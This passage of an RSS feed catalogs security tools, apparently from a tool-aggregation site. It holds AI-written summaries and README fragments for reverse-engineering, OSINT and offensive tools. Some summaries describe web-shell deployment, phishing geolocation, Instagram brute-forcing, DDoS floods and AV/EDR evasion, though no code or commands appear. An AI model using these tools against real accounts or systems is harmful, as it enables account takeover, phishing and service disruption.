&lt;p&gt;30 low-high level honeypots in a single PyPI package for monitoring network traffic, bots activities, and username \ password credentials.&lt;/p&gt;</description></item><item><title>HookCase</title><link>https://rainmana.github.io/hackyfeed/tools/steven-michaud-hookcase/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/steven-michaud-hookcase/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HookCase is a powerful debugging and reverse engineering tool for macOS that enhances the capabilities of Apple&amp;rsquo;s &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt;. It allows users to hook methods in any module, including non-exported functions, and can target both parent and child processes simultaneously. Key features include support for watchpoints and the ability to bypass Apple&amp;rsquo;s restrictions on &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt;, making it suitable for working with applications that have entitlements.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="hookcase"&gt;HookCase&lt;/h1&gt;
&lt;p&gt;HookCase is a tool for debugging and reverse engineering applications
on macOS (aka OS X), and the operating system itself. It re-implements
and extends
&lt;a href="https://books.google.com/books?id=K8vUkpOXhN4C&amp;amp;pg=PA73&amp;amp;lpg=PA73&amp;amp;dq=%22dyld+interposing%22+Singh."&gt;Apple&amp;rsquo;s &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; functionality&lt;/a&gt;.
It can be used to hook any method in any module (even non-exported
ones, and even those that don&amp;rsquo;t have an entry in their own module&amp;rsquo;s
symbol table). In a single operation, it can be applied to a parent
process and all its child processes, whether or not the child
processes inherit their parent&amp;rsquo;s environment. It supports
watchpoints. So HookCase is considerably more powerful than
&lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt;. It also doesn&amp;rsquo;t have the restrictions Apple
has placed on &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt;. So, for example, HookCase can
be used with applications that have
&lt;a href="https://developer.apple.com/library/content/documentation/Miscellaneous/Reference/EntitlementKeyReference/Chapters/AboutEntitlements.html"&gt;entitlements&lt;/a&gt;.
HookCase runs on OS X 10.9 (Mavericks) through macOS 26 (Tahoe).&lt;/p&gt;</description></item><item><title>HostHunter</title><link>https://rainmana.github.io/hackyfeed/tools/spiderlabs-hosthunter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/spiderlabs-hosthunter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HostHunter is a Python-based tool designed for the discovery and extraction of hostnames linked to specified IPv4 or IPv6 addresses, utilizing OSINT and active reconnaissance methods. It generates comprehensive reports in various formats, including CSV and Nessus, and features capabilities like SSL certificate extraction, hostname validation, and the ability to capture screenshots of target applications. This tool is particularly beneficial for organizations aiming to assess their attack surface effectively.&lt;/p&gt;</description></item><item><title>houdini</title><link>https://rainmana.github.io/hackyfeed/tools/cybersecsi-houdini/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cybersecsi-houdini/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HOUDINI is a comprehensive collection of Docker images designed for network intrusion testing, facilitating offensive security practices. It not only provides extensive listings of tools but also includes pre-defined &lt;code&gt;docker run&lt;/code&gt; commands and cheatsheets for ease of use. Additionally, the repository encourages community contributions to expand its toolset, enhancing collaborative development in network security.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="-houdini-hundreds-of-offensive-and-useful-docker-images-for-network-intrusion"&gt;🐳 HOUDINI: Hundreds of Offensive and Useful Docker Images for Network Intrusion&lt;/h1&gt;
&lt;p&gt;HOUDINI is a curated list of &lt;strong&gt;Network Security&lt;/strong&gt; related Docker Images for Network Intrusion purposes. A lot of images are created and kept updated through our &lt;a href="https://github.com/cybersecsi/RAUDI"&gt;RAUDI&lt;/a&gt; repository. Pretty dope, eh?&lt;/p&gt;</description></item><item><title>hrtng</title><link>https://rainmana.github.io/hackyfeed/tools/kasperskylab-hrtng/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/kasperskylab-hrtng/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The hrtng IDA plugin provides a suite of tools designed to enhance the reverse engineering process within the IDA Pro environment, specifically leveraging the Hex-Rays decompiler. Its notable features include automation of variable renaming, interactive pseudocode transformations, various decryption capabilities, and assistance with obfuscated code analysis, all aimed at improving the efficiency and accuracy of binary analysis tasks. The plugin integrates seamlessly into IDA’s existing functionality, offering a structured approach to handling complex code scenarios.&lt;/p&gt;</description></item><item><title>htrace.sh</title><link>https://rainmana.github.io/hackyfeed/tools/trimstray-htrace.sh/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/trimstray-htrace.sh/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; &lt;code&gt;htrace.sh&lt;/code&gt; is a shell script designed for troubleshooting and profiling HTTP/HTTPS communications, serving as a wrapper for various open-source security tools. Its primary use case includes diagnosing web application vulnerabilities, analyzing SSL configurations, and extracting response headers and body content through an array of customizable parameters and options. Notable features include the ability to integrate with tools such as testssl, Mozilla&amp;rsquo;s Observatory, and Nmap&amp;rsquo;s NSE for comprehensive security assessments.&lt;/p&gt;</description></item><item><title>htshells</title><link>https://rainmana.github.io/hackyfeed/tools/wireghoul-htshells/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wireghoul-htshells/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HTSHELLS is a toolkit that facilitates the deployment of self-contained web shells and various web-based attack vectors by utilizing .htaccess files. Its primary use case is for penetration testing and exploitation, allowing users to execute commands remotely and conduct denial-of-service, information disclosure, directory traversal, and other attacks through a structured directory of attack modules. Notable features include the ability to generate custom .htaccess files for specific attack types and execute commands via query parameters, enhancing flexibility for security assessments.&lt;/p&gt;</description></item><item><title>HyperDbg</title><link>https://rainmana.github.io/hackyfeed/tools/hyperdbg-hyperdbg/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hyperdbg-hyperdbg/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HyperDbg is an open-source, hypervisor-assisted debugger designed for advanced analysis, fuzzing, and reversing of Windows applications at both user and kernel levels. It leverages modern hardware features like Intel VT-x and EPT, enabling stealthy operation that resists detection by classic anti-debugging techniques, while offering unique capabilities such as hidden hooks and code coverage measurement. This tool is tailored for users with deep low-level system knowledge, providing full control over the operating system for intricate debugging tasks.&lt;/p&gt;</description></item><item><title>I-See-You</title><link>https://rainmana.github.io/hackyfeed/tools/viralmaniar-i-see-you/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/viralmaniar-i-see-you/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; I-See-You is a Bash and JavaScript tool designed for identifying the precise geographical location of users during social engineering or phishing attempts by utilizing their location coordinates. The tool allows attackers to gather crucial reconnaissance data, facilitating targeted attacks, and functions without requiring any additional software for phishing operations. Users can easily execute the tool by running a script and can modify the appearance of the phishing page to enhance deception.&lt;/p&gt;</description></item><item><title>iaito</title><link>https://rainmana.github.io/hackyfeed/tools/hteso-iaito/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hteso-iaito/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Iaitō is a GUI application developed in Qt and C++ that serves as a frontend for the radare2 reverse engineering framework, specifically targeting users who are not familiar with command-line interfaces. The tool is designed to lower the barrier of entry for new users by providing a more accessible interface, although it is currently in an alpha state and primarily intended for developers. Notable features include cross-platform support for OS X, Linux, and Windows, along with installation requirements for radare2 and Qt.&lt;/p&gt;</description></item><item><title>ida-pro-mcp</title><link>https://rainmana.github.io/hackyfeed/tools/mrexodia-ida-pro-mcp/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mrexodia-ida-pro-mcp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The IDA Pro MCP is a simple MCP server designed to facilitate vibe reversing in IDA Pro, allowing users to interact with supported MCP clients for enhanced reverse engineering tasks. Key features include installation support via pip, configuration for various MCP clients, and guidance on prompt engineering to optimize interactions with large language models during the analysis process. This tool is particularly beneficial for users looking to streamline the reverse engineering process using advanced AI techniques in conjunction with traditional analysis tools.&lt;/p&gt;</description></item><item><title>idacode</title><link>https://rainmana.github.io/hackyfeed/tools/ioncodes-idacode/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ioncodes-idacode/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; IDACode is a Visual Studio Code extension designed to facilitate the execution and debugging of Python scripts within the IDA Pro environment. Notable features include quick script execution, seamless integration with the Python debugger via &lt;code&gt;debugpy&lt;/code&gt;, and the ability to run scripts without modifications directly from IDA. The tool supports features like &amp;ldquo;Execute on save&amp;rdquo; for automatic script execution and has been tested for compatibility with IDA versions 8.4/9.0 and Python 3.12 on both Windows and macOS.&lt;/p&gt;</description></item><item><title>ighack</title><link>https://rainmana.github.io/hackyfeed/tools/noob-hackers-ighack/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/noob-hackers-ighack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ighack is a Bash-based tool designed for testing the password strength of Instagram accounts through brute-force attacks, compatible with both rooted and non-rooted Android devices using Termux. It offers features such as a stable Instagram API, support for Tor to enhance anonymity during attacks, and both auto and manual attack options for user flexibility. The tool is maintained and provides a beginner-friendly interface, allowing easy installation and usage.&lt;/p&gt;</description></item><item><title>ignorant</title><link>https://rainmana.github.io/hackyfeed/tools/megadose-ignorant/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/megadose-ignorant/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ignorant is a tool designed to check the presence of a phone number across various platforms, such as Snapchat and Instagram, without alerting the target. Its primary use case is to facilitate user verification linked to phone numbers for security assessments, while notable features include support for asynchronous operations, rate limiting detection, and integration with multiple modules for different websites.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="ignorant"&gt;Ignorant&lt;/h1&gt;
&lt;p&gt;👋 Hi there! For any professional inquiries or collaborations, please reach out to me at:
&lt;a href="mailto:megadose@protonmail.com"&gt;megadose@protonmail.com&lt;/a&gt;&lt;/p&gt;</description></item><item><title>iKy</title><link>https://rainmana.github.io/hackyfeed/tools/kennbroorg-iky/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/kennbroorg-iky/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; iKy is a cybersecurity tool designed to collect and display information related to email addresses through an intuitive visual interface. It integrates multiple modules such as FullContact, LinkedIn, and HaveIBeenPwned, allowing users to gather diverse data points about email owners, enhancing the reconnaissance process in cybersecurity investigations. The tool leverages technologies like Flask for the interface, Redis for storage, and is deployable via Docker, ensuring robust performance and ease of use.&lt;/p&gt;</description></item><item><title>Il2CppDumper</title><link>https://rainmana.github.io/hackyfeed/tools/perfare-il2cppdumper/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/perfare-il2cppdumper/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Il2CppDumper is a reverse engineering tool specifically designed for Unity games that utilize the il2cpp scripting backend, allowing users to extract and analyze game assets such as &lt;code&gt;MonoBehaviour&lt;/code&gt; and &lt;code&gt;MonoScript&lt;/code&gt;. It supports a variety of binary formats (ELF, Mach-O, PE, etc.) and versions of Unity (5.3 to 2022.2), while also generating scripts compatible with analysis tools like IDA, Ghidra, and Binary Ninja to facilitate in-depth examination of il2cpp files. Notably, it offers functionalities for bypassing simple protections and generating comprehensive DLL restorations and structure header files.&lt;/p&gt;</description></item><item><title>imessage-exporter</title><link>https://rainmana.github.io/hackyfeed/tools/reagentx-imessage-exporter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/reagentx-imessage-exporter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The imessage-exporter is a versatile tool for exporting, managing, and diagnosing iMessage data, providing both library and binary functionalities. It facilitates the saving and archiving of message history, including multimedia content, into open formats, while also supporting migration and compliance with data retention policies. Notable features include cross-platform support, extensive compatibility with iMessage functionalities, and diagnostic tools to ensure the integrity of the iMessage database.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="imessage-exporter"&gt;imessage-exporter&lt;/h1&gt;
&lt;p&gt;This crate provides both a library to interact with iMessage data as well as a binary that can perform some useful read-only operations using that data. The aim of this project is to provide the most comprehensive and accurate representation of iMessage data available.&lt;/p&gt;</description></item><item><title>Impulse</title><link>https://rainmana.github.io/hackyfeed/tools/limerboy-impulse/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/limerboy-impulse/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Impulse is a modern denial-of-service toolkit designed for executing various DDoS attack methods, including SMS, email, and multiple network traffic overload techniques like SYN and UDP floods. Its notable features include a user-friendly interface and support for methods such as Slowloris and NTP amplification, allowing attackers to exploit vulnerabilities across multiple platforms including Windows, Linux, and Termux. This tool can be leveraged to stress test and demonstrate the potential impact of denial-of-service attacks on targeted systems.&lt;/p&gt;</description></item><item><title>inceptor</title><link>https://rainmana.github.io/hackyfeed/tools/klezvirus-inceptor/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/klezvirus-inceptor/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Inceptor is a Windows-focused penetration testing tool designed to automate the bypassing of anti-virus (AV) and endpoint detection and response (EDR) solutions. It features a template-based PE packer that allows extensive user customization and integrates various encoding methods for encoding, compressing, or encrypting shellcode. Notably, Inceptor supports transformations of existing binaries into shellcode and distinguishes between loader-independent and loader-dependent encoders to enhance payload obfuscation and evade detection.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;:triangular_flag_on_post: This is the public repository of Inceptor, for latest version and updates please consider supporting us through &lt;a href="https://porchetta.industries/"&gt;https://porchetta.industries/&lt;/a&gt;&lt;/p&gt;</description></item><item><title>infoooze</title><link>https://rainmana.github.io/hackyfeed/tools/devxprite-infoooze/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/devxprite-infoooze/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Infoooze is an OSINT tool designed for efficient information gathering on targets such as websites, IP addresses, and usernames through a command-line interface. Notable features include various reconnaissance capabilities like subdomain scanning, Whois lookups, and automatic results saving to text files, facilitating streamlined data collection. Additionally, it supports multiple operating systems, including Linux, Windows, and Termux.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div id="top"&gt;&lt;/div&gt;
&lt;!-- PROJECT LOGO --&gt;
&lt;br /&gt;
&lt;div align="center"&gt;
 &lt;a href="https://github.com/devXprite/infoooze"&gt;
 &lt;img src="./images/logo-main.png" alt="Logo" height="135px"&gt;
 &lt;/a&gt;
&lt;h2 align="center"&gt;Infoooze&lt;/h2&gt;
 &lt;p align="center"&gt;
 &lt;a href="https://github.com/devXprite/infoooze/issues/new?assignees=&amp;labels=bug&amp;template=bug_report.md&amp;title="&gt;Report Bug&lt;/a&gt;
 ·
 &lt;a href="https://github.com/devXprite/infoooze/issues"&gt;Request Feature&lt;/a&gt;
 &lt;/p&gt;
 &lt;img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/devXprite/infoooze?style=flat"&gt;
 &lt;img alt="npms.io (final)" src="https://img.shields.io/npms-io/quality-score/infoooze"&gt;
 &lt;img alt="npm version" src="https://img.shields.io/npm/v/infoooze?color=green&amp;label=version&amp;style=flat"&gt; &lt;br&gt;
 &lt;img alt="npm" src="https://img.shields.io/npm/dm/infoooze?style=flat"&gt;
 &lt;img alt="Libraries.io SourceRank" src="https://img.shields.io/librariesio/sourcerank/npm/infoooze"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;!-- TABLE OF CONTENTS --&gt;
&lt;h2 id="table-of-content"&gt;Table of Content&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href="#about-infoooze"&gt;About Infoooze&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#features"&gt;Features&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#support"&gt;Support&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#getting-started"&gt;Getting Started&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#prerequisites"&gt;Prerequisites&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#getting-started"&gt;Installation on Linux&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#getting-started"&gt;Installation on Android&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#uninstall"&gt;Uninstall&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#usage"&gt;Usage&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#options"&gt;Options&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#examples"&gt;Examples&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#run-with-gitpod"&gt;Run in Gitpod&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#contributing"&gt;Contributing&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#license"&gt;License&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#contact"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;!-- ABOUT THE PROJECT --&gt;
&lt;h2 id="about-infoooze"&gt;About Infoooze&lt;/h2&gt;
&lt;p&gt;Infoooze is a powerful and user-friendly OSINT (Open-Source Intelligence) tool that allows you to quickly and easily gather information about a specific target. With Infoooze, you can easily search for information about websites, IP addresses, usernames, and more, all from the convenience of a simple command-line interface.&lt;/p&gt;</description></item><item><title>Information_Collection_Handbook</title><link>https://rainmana.github.io/hackyfeed/tools/qftm-information_collection_handbook/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/qftm-information_collection_handbook/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Information Collection Handbook is a comprehensive resource designed for penetration testers, focusing on effective information gathering techniques essential for vulnerability exploitation. It consolidates various methods and tools for domain and subdomain information collection, including online services, browser plugins, and advanced querying techniques, thereby enabling security professionals to uncover assets and vulnerabilities that may otherwise remain hidden. Notable features include detailed sections on Whois queries, DNS historical analysis, and strategies for bypassing content delivery networks (CDNs) to uncover real IP addresses.&lt;/p&gt;</description></item><item><title>Infosec_Reference</title><link>https://rainmana.github.io/hackyfeed/tools/rmusser01-infosec_reference/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rmusser01-infosec_reference/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The InfoSec Reference project serves as a comprehensive resource for individuals seeking to enhance their understanding of Information Security, offering a curated list of techniques, tools, and tactics. Its primary use case revolves around providing a &amp;ldquo;Yellow Pages&amp;rdquo; style reference for users to browse and learn about various aspects of infosec, helping them build skills and recall pertinent information. Notably, it encourages community contributions and maintains regular updates, while emphasizing a commitment to ethical practices in cybersecurity.&lt;/p&gt;</description></item><item><title>inql</title><link>https://rainmana.github.io/hackyfeed/tools/doyensec-inql/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/doyensec-inql/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; InQL is an open-source Burp Suite extension tailored for advanced GraphQL testing, enabling security professionals to effectively identify vulnerabilities within GraphQL APIs. It features a user-friendly interface, robust query manipulation capabilities, and integration with Burp&amp;rsquo;s existing tools, significantly enhancing the testing process for GraphQL applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="inql-v612---burp-extension-for-advanced-graphql-testing"&gt;InQL v6.1.2 - Burp Extension for Advanced GraphQL Testing&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://doyensec.com/research.html"&gt;&lt;img src="https://img.shields.io/static/v1?logo=data:image/png;base64,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&amp;amp;link=https://doyensec.com/research.html&amp;amp;message=Research%20Island&amp;amp;&amp;amp;label=Doyensec&amp;amp;color=purple" alt="Doyensec Research Island"&gt;&lt;/a&gt;
&lt;img src="https://img.shields.io/github/license/doyensec/inql?logo=github&amp;amp;color=darkgreen" alt="GitHub"&gt;
&lt;img src="https://img.shields.io/github/v/release/doyensec/inql?label=latest%20release&amp;amp;logo=github" alt="GitHub release (latest by date)"&gt;
&lt;img src="https://img.shields.io/github/release-date/doyensec/inql?display_date=published_at&amp;amp;logo=github" alt="GitHub Release Date"&gt;
&lt;a href="https://github.com/doyensec/inql/tree/dev"&gt;&lt;img src="https://img.shields.io/github/commits-difference/doyensec/inql?base=master&amp;amp;head=dev&amp;amp;label=dev+branch+ahead+by&amp;amp;color=bright&amp;amp;logo=github" alt="dev branch ahead by"&gt;&lt;/a&gt;
&lt;a href="AUTHORS"&gt;&lt;img src="https://img.shields.io/github/contributors/doyensec/inql?logo=github&amp;amp;color=black" alt="GitHub contributors"&gt;&lt;/a&gt;
&lt;a href="https://github.com/doyensec/inql/issues?q=is%3Aissue+is%3Aopen+label%3A%22Help+Wanted%22"&gt;&lt;img src="https://img.shields.io/github/issues/doyensec/inql/Help%20Wanted?color=red&amp;amp;logo=github" alt="GitHub issues by-label"&gt;&lt;/a&gt;
&lt;a href="https://github.com/doyensec/inql/issues?q=is%3Aissue+is%3Aopen+label%3A%22Good+First+Issue%22"&gt;&lt;img src="https://img.shields.io/github/issues/doyensec/inql/Good%20First%20Issue?color=f0a&amp;amp;logo=github" alt="GitHub issues by-label"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>insta-hack</title><link>https://rainmana.github.io/hackyfeed/tools/incrediblehacker-insta-hack/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/incrediblehacker-insta-hack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Insta-hack is a comprehensive tool designed for Instagram account compromise, featuring capabilities for information gathering, brute force attacks, and automated reporting. It operates on both Termux and Kali Linux without the need for root access and includes essential functionalities such as script updates and removals. The tool is intended strictly for educational use, with a clear emphasis on responsible usage.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h2 id="about-tool"&gt;About tool&lt;/h2&gt;
